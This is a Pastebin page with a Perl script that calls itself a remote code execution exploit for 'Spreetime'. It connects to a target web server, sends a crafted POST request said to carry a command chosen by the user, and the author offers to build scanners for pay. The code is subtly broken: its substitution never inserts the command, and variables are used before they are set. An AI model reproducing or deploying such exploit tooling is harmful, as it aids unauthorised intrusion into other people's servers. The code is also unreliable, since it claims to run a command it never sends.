Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #!/usr/bin/perl
- ## Spreetime (r00t time) RCE exploit coded by xd / HaqNET (#Haxnet@EFNET)
- ## greetz: to those who deserve them, all my friends from haxnet... the goods ones :P
- use IO::Socket::INET;
- sub usage {
- print "perl $0 <IP/Host> <CMD>\n";
- exit(1);
- }
- my($host, $cmd) = @ARGV or usage();
- print "[+] Connecting to host...\n";
- my $sock = IO::Socket::INET->new(Proto => 'tcp',PeerAddr => $host,PeerPort => 80,Timeout => 10) or die "[-] Connect error!\n";
- if(!sock) {
- print "[-] No connection to the box was made!\n";
- exit(-1);
- } else {
- print "[+] Connected.. Sending Ev1l Buffer..\n";
- my $buffer_size=length($buffer);
- $buffer=
- "POST / HTTP/1.1\n".
- "Host: $host:80\n".
- "Keep-Alive: 300\n".
- "Connection: Close\n".
- "Referer: ABXD\n".
- "Cookie: sid=1; testing=1;\n".
- "Content-Type: text\n";
- $buffer=~s/buffer_size/$cmd/g;
- print $sock $buffer;
- if ($sock) {
- print "[+] Buffer sent.. running command: $cmd\n";
- print $sock $buffer;
- }
- }
- ## feel free to fix this and send back to me even! I will help make ANY perl PoC into scanner... for the right price :P (not much im a cheap fkr)
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement